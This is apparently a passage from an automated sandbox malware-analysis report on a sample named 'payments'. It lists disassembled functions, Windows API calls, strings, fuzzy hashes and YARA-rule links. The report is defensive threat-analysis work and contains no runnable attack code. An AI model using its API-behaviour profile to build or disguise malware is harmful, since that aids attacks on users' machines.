                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: a0166d0fc586c06bb5ea9a33a793d93e5ec5c4c5c5934aad7c21ba7d87c7075d
                                                                                                                          • Instruction ID: 08824e61b822b3abee588d3af57688ed2cf4b55366cb1b19497c6d625d533982
                                                                                                                          • Opcode Fuzzy Hash: a0166d0fc586c06bb5ea9a33a793d93e5ec5c4c5c5934aad7c21ba7d87c7075d
                                                                                                                          • Instruction Fuzzy Hash: C011EE70500748AFDB20CF34C891AE7BBE9BF05300F10850DEAAA87391DB316906DB62
                                                                                                                          Function 00CEA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CEA84E
                                                                                                                          • htons.WSOCK32(00000000,?,00000000), ref: 00CEA88B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: htonsinet_addr
                                                                                                                          • String ID: 255.255.255.255
                                                                                                                          • API String ID: 3832099526-2422070025
                                                                                                                          • Opcode ID: e2d82b6d0631ab2addf63d2e6a403641a8c2191f3e70756bbe604b1ce2977a87
                                                                                                                          • Instruction ID: 27bd481465d404871a4711566f70ad5f6b10de92416cc5896b95c02261a0db4e
                                                                                                                          • Opcode Fuzzy Hash: e2d82b6d0631ab2addf63d2e6a403641a8c2191f3e70756bbe604b1ce2977a87
                                                                                                                          • Instruction Fuzzy Hash: 5C01D275200345AFCB219F69C896FA9B365EF44310F10842AF5269B3D1DB71E806D766
                                                                                                                          Function 00CFF2D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00D0E44F,?,?,?), ref: 00CFF344
                                                                                                                            • Part of subcall function 00CAB526: GetWindowLongW.USER32(?,000000EB), ref: 00CAB537
                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00CFF32A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow$MessageProcSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 982171247-2594219639
                                                                                                                          • Opcode ID: abc18f749a557bc3c42802b47d7e6f0e26e263f46b23c6f3dbf8680cad71b921
                                                                                                                          • Instruction ID: ef61df8e727785b798c95ecefe8a24d7c183b2da5d9e40275ca4eb9d866f43dc
                                                                                                                          • Opcode Fuzzy Hash: abc18f749a557bc3c42802b47d7e6f0e26e263f46b23c6f3dbf8680cad71b921
                                                                                                                          • Instruction Fuzzy Hash: 6F019E35201218ABCB219F14DC44FBA7B67FF86325F284568FA554B2B1C771AC07DB62
                                                                                                                          Function 00CCC65B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCC66D
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00CCC69D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: fa3e99bac9449487dfdca4c8c5697e88149ce0188a157139ace009978d425ee4
                                                                                                                          • Instruction ID: e8124443378b9e56ee4e5554b5e8d1bce6386e906c0c6f783a18e77ac334d030
                                                                                                                          • Opcode Fuzzy Hash: fa3e99bac9449487dfdca4c8c5697e88149ce0188a157139ace009978d425ee4
                                                                                                                          • Instruction Fuzzy Hash: 92F0A075240318BFEB156E90ECC6FE67B69EB187A6F108018F7095A1D0CAE25D11A770
                                                                                                                          Function 00CCC7D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCC2DE: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00CCC2F7
                                                                                                                            • Part of subcall function 00CCC2DE: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CCC331
                                                                                                                          • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00CCC7FC
                                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CCC80C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: dc8cdfbcbdd1d0d4eec3ac7b18ba17b6279d84f6d4cfee8e21439daea2fa3b2d
                                                                                                                          • Instruction ID: b8478edd0396792ef88af3f658916d466fba3ee59f1812652b157bed6747935e
                                                                                                                          • Opcode Fuzzy Hash: dc8cdfbcbdd1d0d4eec3ac7b18ba17b6279d84f6d4cfee8e21439daea2fa3b2d
                                                                                                                          • Instruction Fuzzy Hash: 6FE092792443097BF7111A61DC8AEA73B6DEB48751F104029F60495191EEA28C12A530
                                                                                                                          Function 00CD7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassName_wcscmp
                                                                                                                          • String ID: #32770
                                                                                                                          • API String ID: 2292705959-463685578
                                                                                                                          • Opcode ID: ad4a7b387cfad52c3c98be8dc95e977e5dcf4ad267e03ad822f26d2788730edf
                                                                                                                          • Instruction ID: 233ad8673d39bc18195ea083b9b3682927c1de7f4814da51c7c139efeefe87a5
                                                                                                                          • Opcode Fuzzy Hash: ad4a7b387cfad52c3c98be8dc95e977e5dcf4ad267e03ad822f26d2788730edf
                                                                                                                          • Instruction Fuzzy Hash: 84E0D8776043292BD720EBA9DC09EC7FBACEB51760F010156F915D3141E670E70587E0
                                                                                                                          Function 00CCA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CCA63F
                                                                                                                            • Part of subcall function 00CB13F1: _doexit.LIBCMT ref: 00CB13FB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message_doexit
                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                                          • Opcode ID: 91b000bdfa7c94f4f9bcb101852f73a7691e866fa80f91a0586773d87bb4072e
                                                                                                                          • Instruction ID: fedd59f6b53a71eb59fedcc6cd0bcbbd02dfc55b9cf175d12e8631b57d7a40bf
                                                                                                                          • Opcode Fuzzy Hash: 91b000bdfa7c94f4f9bcb101852f73a7691e866fa80f91a0586773d87bb4072e
                                                                                                                          • Instruction Fuzzy Hash: 44D02B313C032C3BD21136D97C1BFC476488B15B55F040015FF08951D24DF2C64012F9
                                                                                                                          Function 00D0AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00D0ACC0
                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D0AEBD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryFreeLibrarySystem
                                                                                                                          • String ID: WIN_XPe
                                                                                                                          • API String ID: 510247158-3257408948
                                                                                                                          • Opcode ID: 1b09b84842e58365622ed6d3d712e2c111263ab6757db538ee724fb9b8c99452
                                                                                                                          • Instruction ID: 112b172b141a343a6ec40d2b87bf65b7184edcea24e74eab4c0858e2c259822a
                                                                                                                          • Opcode Fuzzy Hash: 1b09b84842e58365622ed6d3d712e2c111263ab6757db538ee724fb9b8c99452
                                                                                                                          • Instruction Fuzzy Hash: A6E06574C00749EFDB11DBA9D944AECB7B8AB88301F158081E056B22A0CB704A85DF3A
                                                                                                                          Function 00CF86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF86E2
                                                                                                                          • PostMessageW.USER32(00000000), ref: 00CF86E9
                                                                                                                            • Part of subcall function 00CD7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7AD0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                          • Opcode ID: 6fbc66aa8c5673d1b72e5792e653d98eb2c32c1b1c02f080b46785a48bff0139
                                                                                                                          • Instruction ID: 8d45feb2324c348ff361ade379e113276329b052ecfad802ad0614760d735e11
                                                                                                                          • Opcode Fuzzy Hash: 6fbc66aa8c5673d1b72e5792e653d98eb2c32c1b1c02f080b46785a48bff0139
                                                                                                                          • Instruction Fuzzy Hash: 88D012313853287BF264A770AC0BFC67A199B05B21F504915F749EA2D0CEF4E941C774
                                                                                                                          Function 00CF8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF86A2
                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CF86B5
                                                                                                                            • Part of subcall function 00CD7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7AD0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                          • Opcode ID: 200ff3bb8dde8b9c7c96b7db2f600e374120fe07a6131db2f098b4af61f1e874
                                                                                                                          • Instruction ID: a6bd74176aad04081177c3449341edbd850cb34297165eece895c0e7dd524d9f
                                                                                                                          • Opcode Fuzzy Hash: 200ff3bb8dde8b9c7c96b7db2f600e374120fe07a6131db2f098b4af61f1e874
                                                                                                                          • Instruction Fuzzy Hash: F7D01231384328BBF264A770AC0BFC67A199B04B21F104915F749EA2D0CEF4E941C774